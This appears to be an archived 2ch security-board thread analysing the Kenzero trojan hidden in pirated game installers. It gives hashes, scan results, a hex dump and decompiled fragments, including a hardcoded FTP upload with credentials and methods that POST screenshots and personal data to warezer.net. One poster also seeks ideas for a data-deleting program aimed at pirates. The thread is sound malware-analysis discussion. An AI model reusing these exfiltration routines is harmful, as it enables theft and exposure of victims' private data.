http://tsushima.2ch.net/test/read.cgi/news/1259236812/
setup.exeを実行するとスクリーンショット+個人情報が晒されるウイルスとのこと
AVGやAvastを入れてながらも被害が出ています
/ \
/ _ノ ヽ、_ \
/ o゚((●)) ((●))゚o \ ほんとはニュー速でやりたいんだお…
| (__人__)' |
\ `⌒´ /
____
/ \
/ _ノ ヽ、_ \
/ o゚⌒ ⌒゚o \ でもニュー速民はクオリティ高いスレしか相手してくれないお…
| (__人__) |
\ ` ⌒´ /
____
/⌒ ⌒\
/( ●) (●)\
/::::::⌒(__人__)⌒::::: \ だからセキュ板でやるお!
| |r┬-| |
\ `ー'´ /
バスター厨大勝利
ファイルサイズ: 56832 bytes
ファイルタイプ: PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
MD5: 7d69a51fd4e2c7e62b5f7aaaddd50b56
SHA1: 96e9e72d8e577acb687d01bebe626bbff791479c
ttp://www.virustotal.com/isis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259248350
おいおい検出0かよ。
バスターは検出ってレス見たけど?
これらしい
検体
Sc_58437
間違えて送信しちゃったかも、クリーン環境だけど
素人で申し訳ない
どこで入手できるんでしょうか
ttp://www.axfc.net/uploader/
ありがとうございます。
,NETアプリのようで、これはヒューリスティックでも検出は困難そうですね。
犯人の名前は健三さんかもしれませんね。
0x0040E520 43 3A 5C 55 73 65 72 73 5C 4B 45 4E 5A 4F 5C 44 C:\Users\KENZO\D +C520
0x0040E530 6F 63 75 6D 65 6E 74 73 5C 56 69 73 75 61 6C 20 ocuments\Visual +C530
0x0040E540 53 74 75 64 69 6F 20 32 30 30 38 5C 50 72 6F 6A Studio 2008\Proj +C540
0x0040E550 65 63 74 73 5C 50 61 73 73 77 6F 72 64 54 72 61 ects\PasswordTra +C550
0x0040E560 70 5C 50 61 73 73 77 6F 72 64 54 72 61 70 5C 6F p\PasswordTrap\o +C560
0x0040E570 62 6A 5C 44 65 62 75 67 5C 53 65 74 75 70 2E 70 bj\Debug\Setup.p +C570
0x0040E580 64 62 00 00 AC E5 00 00 00 00 00 00 00 00 00 00 db.............. +C580
もうサイトは404で見れないけど、一人一人にゲーム名が書いてあったから
ゲームの数だけexeがあるのかと思ったけど
string requestUriString = "ftp://ftp96.heteml.jp/web/img/user/" + Settings.Default.image;
string str5 = path + @"\" + Settings.Default.image;
WebRequest request = WebRequest.Create(requestUriString);
request.Credentials = new NetworkCredential("p3p", "sameru");
犯人の好きなブランドの名前じゃないのかなぁ
全部大文字だし
それともデマ?
全てを無効化する起動スイッチをつけたchromeが立ち上がるようにしてあります
SS撮影のタイミングと送信のタイミングってどうなってたの?
ありがと
妙なタイミングだね
exe起動後におかしいと気づいてネット切断するケースも多そうなのに
お前ウイルス作った本人だろ?w
覚悟しとけよ^^
> とりあえずhttp://www.pass-word.org/のロゴ変えて来た
ν速民の遊び場になってる。
しかし、XSSの対応とか全くしてないんだな。
そんな知識もないんだろう。
カス過ぎる。
実はエロゲのCGばかりでなうpられてるzipとかにもよくある
つまり二次エロ画像のzipをダウンロードしてる人も割れ厨と似たような人間って事だ(キリッ
トロイに感染しまくりで役に立ったことないな。
http://birthofblues.livedoor.biz/archives/50949467.html
KENZOはどん欲さと詰めの甘さで残念なことになったが、俺はパワーユーザでも引っかかってしまうようなクオリティーを目指して頑張るぜ
気をつけろよwwwwwwwwwwwwwwwww
情弱割れ厨を片っ端から駆逐するようなウイルスをさっさと作れよ
それをやるとなぜかブチ切れるユーザーが現れるんだよな「ウイルスじゃない!ファビョーン」って
AVGやavastとかも確かやったがすぐ修正した
http://www.vector.co.jp/soft/win95/amuse/se217070.html
HIKARU
作者: 林 啓文
一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフト
一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフトです。このプログラムは起動させても何の
表示もせず、起動しているのがわかりません。何の表示もせずにプログラムはメモリに常駐します。起動させて数分後、突然
女性の幽霊の画像がディスプレーに表示され、同時にスピーカーから女性の悲鳴が流れます。画像は一秒位で消えます。
そのあとはWindowsを再起動するまで、何度も現れます。
※ 警告:子供、妊婦、心臓が弱い方、精神的に弱い方等はこのソフトを使用しないでください。
注記:使用しているウイルススキャナーによってはJOKEプログラムであるとの判断の元で警告が出る場合があります。ご利用の
さいにはその点を確認の上でご使用ください。
VirusTotal - 無料オンライン ウイルス/マルウェア スキャン - 結果
ファイル名 hikaru.exe 受理 2009.11.27 22:15:19 (UTC)
現在の状態: 完了
結果: 27/41 (65.86%)
http://www.virustotal.com/jp/isis/3c13e6169994f9e5eab10642200b5e91457b93676c73e1695caee530623d4f0b-1259360119
踏んだときの動作として定番のデータ削除と通報を入れようと思うんだが、なんかいい案はあるか?
もちろん、動作は"このソフトウェアの使用による損害に対し、一切責任を負いません"との免責事項の後にwwww
免責事項あっても悪用される可能性がある事は想定できるから、裁判ではかなり不利だね。
winnyもそれで裁判沙汰になってるんだし。
悪い奴には何してもいい的なものは司法の世界では理解されないんだよ。
やっぱり甘くはないかwwwwwww
でも割れ厨は逝ってほしいw
正式名称がケンゼロウイルスにw
http://www.virustotal.com/isis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259430127
PCTools 7.0.3.5 2009.11.28 Trojan-PSW.Kenzero
Symantec 1.4.4.12 2009.11.28 Infostealer.Kenzero
Result: 4/41 (9.76%)
か。意外と時間かかるもんだな。
結局どう言う事なのかなこれ?
洒落やtorrentなどで落としたエロゲにウィルスが入ってて、起動させたら、スクショとIPアドレス流出。
↓
さらに自分で個人情報を登録。
↓
スクショと個人情報がHPに載せられる
↓
著作権侵害だから金払えメールが来た
こう言うこと?
自分から登録してない人はスクショとIPとかだけ情報もれたって事か?w
みんな検体送ってんのかな?とりあえずsymantecとavastに送っておいたけど
やべぇ、駆除できねぇww
どうゆうことなの…
スクショ貼り先の掲示板がなくなっているってことは、
今このウイルスにかかってもスクショが晒されることないの??
昨日(29日)時点だと、起動してもsetup.exeが終了する。
OSはVista。
スクリーンショットを撮り、
保存するところまでは動作する。
SSはCドライブ直下に作られた
ランダムな英数字のフォルダに保存される。
そこから先の動作はわからない。
vistaとか7はUACあるけど、有効にしていても観戦しちゃうのか・・・
ところで、直下ってことはCの次の階層に数字列の名前で生成されるってことでおk?
http://www.itmedia.co.jp/news/articles/0911/30/news010.html
http://tsushima.2ch.net/test/read.cgi/newsplus/1259539872/-100
各種アンチウィルスソフトが対応したのかな?
もし感染してSSとられた場合、Cを開いた所に勝手に作られた数字名のフォルダがあってそこにSS有るって事か?
いや単純にウィルス駆除できたのかなってこと
>>60の言うとおりsetup.exe削除だけで済んだのかな
ウィルスというより悪質なジョークアプリみたいなもんか
何か解りやすいフォルダにSS入ってるって聞いたから直ぐ見つかると思ったんだけど見つからない。
見つからないと言う事は、感染してなかった奴だったのかもしれないw
まあ、もう消しちゃったけどw
そうだよ
C以下のそれが入ってるフォルダをつまんで捨てるだけw
ただ単にエロゲ落としただけじゃねーか!
トレじゃなくshereのみだったらしいからそりゃ感染してねーわw
そうなの?
torrentの方でも出回っていると聞いたのでやってみたのだが、違ったのか。
そのsetup.exeが48の
http://www.virustotal.com/isis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259430127
でなければ違う。
トレントで流れてるかは不明だけど、たぶん流れてない。
あと今実行しても、>>23の処理ができずに終了するんじゃないかな。
http://www.itmedia.co.jp/enterprise/articles/0911/30/news010.html
検体、圧縮ファイルのままだと、G-Dataでは検出できないんだが・・・。
G-Dataって検出率って世界最高じゃなかったか?
検体送った?
検体送りもしないのに喚いてる奴はクレクレ乞食同様
avastとbitは今送ったけど
などと併せて、Webサイト上で公表されてしまうという。
>>72
送ったよ。
これ、どうやって送るんだ・・・。
最新定義で検出確認済み
ありがとー。
ambulanz_dsk_jap@gdata.de
それ届かなくねーか
112 :名無しさん@お腹いっぱい。:2009/12/02(水) 02:22:48
結果: 0/41 (0.00%)
http://www.virustotal.com/jp/isis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259248350
結果: 12/41 (29.27%)
http://www.virustotal.com/jp/isis/5e92dd5fe8561605a0ecb138725d27373503d129195357edf3e8eef6a0a4685c-1259687279
すぐ上は10分ぐらい前の状態
お前等、どんなに力んでも下のようになるだけだから無駄な抵抗だw
>>43
> Vector:HIKARU (Windows95/98/Me / アミューズメント) - ソフトの詳細
> http://www.vector.co.jp/soft/win95/amuse/se217070.html
> HIKARU
> 作者: 林 啓文
> 一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフト
> 一定時間毎に、突然女性の幽霊の画像がディスプレーに表示されるジョークソフトです。このプログラムは起動させても何の
> 表示もせず、起動しているのがわかりません。何の表示もせずにプログラムはメモリに常駐します。起動させて数分後、突然
> 女性の幽霊の画像がディスプレーに表示され、同時にスピーカーから女性の悲鳴が流れます。画像は一秒位で消えます。
> そのあとはWindowsを再起動するまで、何度も現れます。
> ※ 警告:子供、妊婦、心臓が弱い方、精神的に弱い方等はこのソフトを使用しないでください。
> 注記:使用しているウイルススキャナーによってはJOKEプログラムであるとの判断の元で警告が出る場合があります。ご利用の
> さいにはその点を確認の上でご使用ください。
> VirusTotal - 無料オンライン ウイルス/マルウェア スキャン - 結果
> ファイル名 hikaru.exe 受理 2009.11.27 22:15:19 (UTC)
> 現在の状態: 完了
> 結果: 27/41 (65.86%)
> http://www.virustotal.com/jp/isis/3c13e6169994f9e5eab10642200b5e91457b93676c73e1695caee530623d4f0b-1259360119
しかし落としてきたエロゲーに個人情報律儀に入力するって馬鹿なのかw
Dark Blue
KISS×600 管理人さんのポニーテール
Last Waltz〜白濁まみれの夏合宿〜
PrettyDevilパラダイス〜ミリオム魔界奪還指令!
VenusBlood-DESIRE-
ギリギリ☆すくーぷ2〜潜入!!禁断のチアリーディング部〜
スズノネセブン!-Sweet Lovers' Concerto-
すももぱっく!
そらふね
プリンセス・プリンセス〜姉妹姫背徳の儀式〜
モリガンの憂鬱〜堕の女王〜
辱心療クラブ
妖蟲 悦〜快楽変化退魔録〜
夏いろペンギン-The sunlight of the early summer to glitter to the blue sky-
今日のおかず 第20号
紫電〜円環の絆〜
美\妹 遥「私にイヤらしいコスプレさせるなんて……この!」
魔物娘との性活 ラミアの場合
妹スマイル
他にもあるかも
BBSなんかにうpらないで直接クレカ情報で金稼げばいいのに。
そこが外人と日本人の違うところだな。
割れ厨くろちゃん(笑)の掲示板www
127 以下、名無しにかわりましてVIPが実況します [sage] 2010/01/13(水) 16:51:28.07 ID:TYZQdOG70
マジコン使えばいいじゃん
ISOなら海外サイトに腐るほどあるし
http://www17.atpages.jp/~pugyah/data/1266928086.png
割れ厨チェッカー作ったww
http://yutori7.2ch.net/test/read.cgi/news4vip/1266914677/
これか
http://www.virustotal.com/jp/isis/803cd2095848d1df6104b43c04ce1fc37ca9bd2ac0bc5c7ba85decef14b55984-1266935892
>>175
public int
b_day b_month b_year i_family i_house i_job i_pref i_question
public static
Settings Default
public string
Clip CurrentDirectory HOST IP MachineName MyMusic MyPictures OSVersion Screen TickCount
UserDomainName UserName WorkingSet addr1 addr2 age answer birth company companypost
email f1 f2 family fax feedback filepath fn friend1 friend2 friend3 hero1 hero2 hero3 hobby
house ih ih_dir image instalpass it it_dir job loan lover1 lover2 lover3 mei memail motivation mtel
password pref question salary sei specialty tel type uid zip zip1 zip2
url DefaultSettingValue("http://warezer.net/")
post_ss DefaultSettingValue("ss.php")
しっかり送信するように設定されてたお(´・ω・`)
844 名前: 筆(石川県) [] 投稿日:2010/03/19(金) 19:46:47.79 ID:HHiOP6ls
>>538
いや、ftpとかは無くphpだから
普通に
public static void SiteOpen()
{
Process.Start("http://warezer.net の変数" + "entry/user/" + uid);
}
で
private void UploadFile(); → ss.php に SS.jpg をPOST
private void UploadFile2(); → ss.php に サムネイル_s.jpg をPOST
private void UploadFile3(); → xml.php に データの詰まったuid.xml をPOST
しているだけみたいだよ(´・ω・`)
情報なんて入力してないからどうでもいいっちゃいいんだが
SS撮られるのってsetupを起動した最初だけなのかね?
setupを削除しちまえば後は大丈夫ってんならまぁいいや
MICROSOFT SECURITY ESSENTIALS
trojan:win32/bumat!rts
定義2010/3/22 5:10
ウイルス定義バージョン1.79279.0
スパイ定義バージョン1.79279.0
マルウェア2.1.6519.0
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
フレッツ・ウィルスクリア (346)
ウイルスキラーるろうに剣心 を妄想するスレ (476)
※ウィルス※ Windows Live Messenger で感染!?2 (548)
【無防備】何時間耐えれるかガンガルスレ【常時接続】 (273)
【TrendMicro】ウイルスバスター2010 Part22 (981)
ウイルスキラーVSキングソフトVSウイルスセキュ (257)
--log9.info------------------
【PSVITA】みんなのGOLF6 ロビー集合 2【ネコテン】 (312)
ニンテンドー3DS フレンド登録募集スレ10 (232)
カルドセプトDS晒しスレその14 (685)
スマブラX 緑スネークの心臓爆発おきらく実況スレ2 (382)
【討伐】ラストストーリー Wi-Fi愚痴スレ【乱闘】 (261)
マリオカートDS Wi-Fi対戦専用スレ (761)
【3DS】牧場物語 はじまりの大地 wi-fi交換 part3 (394)
【Wii】ゴールデンアイ007 フレコ交換スレ3【GE】 (380)
【自己】 4世代自由にポケモン交換スレ133 【責任】 (364)
エースコンバットX2対戦チート対策スレ part2 (380)
【Wii】街へ行こうよ どうぶつの森 ノンアポ訪問 3 (536)
【ポケモンBW】GTSに放流したらageるスレ12【放流】 (224)
スマブラX 終点対策第二支部 フレンドコード交換所 (761)
【BW】6Vメタモン交換【無法地帯】part24 (822)
【3DS】牧場物語 はじまりの大地 wifi part8 (904)
マリオカートwii 厨晒しスレ総合 (277)
--log55.com------------------
ユニクロ・しまむらを着る喪女 Part67
【メルカリ】フリマアプリやってる喪女71【フリル】
30代以上の高齢喪女集まれー71
AKB48が好きな喪女★115
ジャニーズ好きな喪女 62
ガールズちゃんねるについて語るスレ 29トピ目
喪女の喪女による喪女のためのアンケートスレ 34題目
どんな質問にもマジレスするスレ150 in喪女板